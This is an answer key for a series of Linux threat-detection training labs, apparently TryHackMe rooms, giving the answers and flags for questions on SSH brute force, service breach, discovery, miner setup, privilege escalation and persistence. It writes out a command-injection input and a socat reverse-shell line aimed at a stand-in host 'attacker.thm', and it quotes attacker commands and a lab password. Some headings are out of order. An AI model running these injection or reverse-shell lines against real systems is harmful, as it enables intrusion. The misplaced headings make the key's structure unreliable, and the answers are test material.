Task 1 : Introduction

Learning Objectives

• Understand the role and risk of SSH in Linux environments

• Learn how Internet-exposed services can lead to breaches

• Utilize process tree analysis to identify the origin of the attack

• Practice detecting Initial Access techniques in realistic labs

Task 2 : Initial Access via SSH

When did the ubuntu user log in via SSH for the first time?Answer Example: 2023-09-16.

2023-09-16.

Did the ubuntu user use SSH keys instead of a password for the above found date? (Yea/Nay)

Yea

When did the SSH password brute force start?Answer Format: 2023-09-15.

2025-08-21

Which four users did the botnet attempt to breach?Separate by a comma, in alphabetical order.

root, roy, sol, user

Finally, which IP managed to breach the root user?

91.224.92.79

Task 3 : Detecting SSH Attacks

What is the path to the Python file the attacker attempted to open?

/opt/trypingme/main.py

Looking inside the opened file, what's the flag you see there?

THM{i_am_vulnerable!}

Task 4 : Initial Access via Services

Task 5 : Detecting Service Breach

What is the PPID of the suspicious whoami command?

1018

Moving up the tree, what is the PID of the TryPingMe app?

577

Which program did the attacker use to open a reverse shell?

Python

Task 6 : Advanced Initial Access

Which Initial Access technique is likely used if a trusted app suddenly runs malicious commands?

Supply Chain Compromise

Which detection method can you use to detect a variety of Initial Access techniques?

Process Tree Analysis

Task 7 : Conclusion

Key Takeaways

• Attacks on SSH are widespread, but they are easy to detect via authentication logs

• Exposed services are always a risk since they can lead to a whole Linux compromise

• Check out the Bulletproof Penguin room to learn how to harden and secure Linux servers

• While phishing is not common on Linux, human-led and supply attacks are still possible

• Process tree analysis is your best approach in identifying the Initial Access techniques

Linux Threat Detection 2 Answers

Task 3 : Detecting Discovery

Run systemd-detect-virt to detect the system's cloud.
What is the command's output you discovered?

Amazon

Now run ps aux and look for EDR or antivirus processes.
What is the full path to the detected antimalware binary?

/var/lib/ultrasec/malscan

Task 2 : Discovery Overview

What is the path of the script that initiated the "hostname" command?

/home/itsupport/debug.sh

What was the last Discovery command launched by the script?

ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%cpu

Looking at the script content, what's the email of the script author?

greg@tryhackme.thm

Task 4 : Motivation for Attacks

From which domain was the Elastic agent downloaded?

artifacts.elastic.co

What is the full path to the downloaded "helper.sh" script?

/var/tmp/helper.sh

Which of the downloaded files is more likely to be malicious:
The one downloaded with curl or wget?

curl

Task 5 : Dota3: First Actions

Which IP address managed to brute-force the exposed SSH?

45.9.148.125

Which command did the attacker use to list the last logged-in users?

last

Which three EDR processes did the attacker look for with "egrep"?
Answer Format: Separated by a comma, in alphabetical order.

ds_agent,falcon,sentinel

Task 6 : Dota3: Miner Setup

What is the name of the malicious archive that was transferred via SCP?

kernupd.tar.gz

What was the full command line of the cryptominer launch?

nohup /tmp/.apt/kernupd/kernupd

Which IP address range did the attacker scan for an exposed SSH?
Answer Example: 10.0.0.1-10.0.0.126.

10.10.12.1-10.10.12.10

Task 7 : Conclusion

Run 127.0.0.1 && whoami in the TryPingMe web app.
What output do you see after the ping results?

svctrypingme

Now try spawning a reverse shell to the imaginary "attacker.thm" address.
Run 127.0.0.1 && socat TCP:attacker.thm:1337 EXEC:sh in the web app.
What is the flag returned in the TryPingMe response?

THM{revshells_practitioner!}

Now look at the exported auditd logs at /home/ubuntu/scenario.
Which IP spawned a similar reverse shell via the TryPingMe app?

10.14.105.255

Linux Threat Detection 3 Answers

Task 2 : Reverse Shells

Key Takeaways

• "Hack and Forget" attacks are usually automated and performed at scale by botnets

• In Linux, all attack stages mostly rely on prebuilt commands like ls, cat, wget, and ssh

• Your best approach in detecting malicious commands is auditd and process tree analysis

Task 3 : Privilege Escalation

Which command line was used to look for the "pass" keyword in files?

grep -iR pass .

Which command line was used to escalate privileges to root?

su root

Looking at the detected .env file, what was the root password?

nGql1pQkGa

Task 4 : Startup Persistence

Which user was created and added to the sudo group?

koichi

Which file was changed to allow SSH key persistence?

/root/.ssh/authorized_keys

Task 5 : Account Persistence

What flag did you get after running the malware persisting as a service?

THM{hidden_penguin!}

What flag did you get after running the malware persisting as a cron job?

THM{ressurect_on_reboot!}

Task 6 : Targeted Attacks and Recap

Does Linux ransomware exist and impact organizations worldwide? (Yea/Nay)

Yea

Should you learn Linux threats even if working with Windows? (Yea/Nay)

Yea

Task 7 : Conclusion

Throughout a series of scenarios and real-world examples, you explored more complex, targeted Linux attacks: How adversaries overcome access constraints, how they maintain long-term persistence, and what goals they pursue.

Many SOC teams skip Linux monitoring, but now you know why it's a dangerous blind spot and are prepared to detect complete attack chains in SIEM or directly on the host. We hope the auditd practice wasn't too painful, and that you enjoyed the Linux Threat Detection journey!

If u want to support me then, Subscribe to my website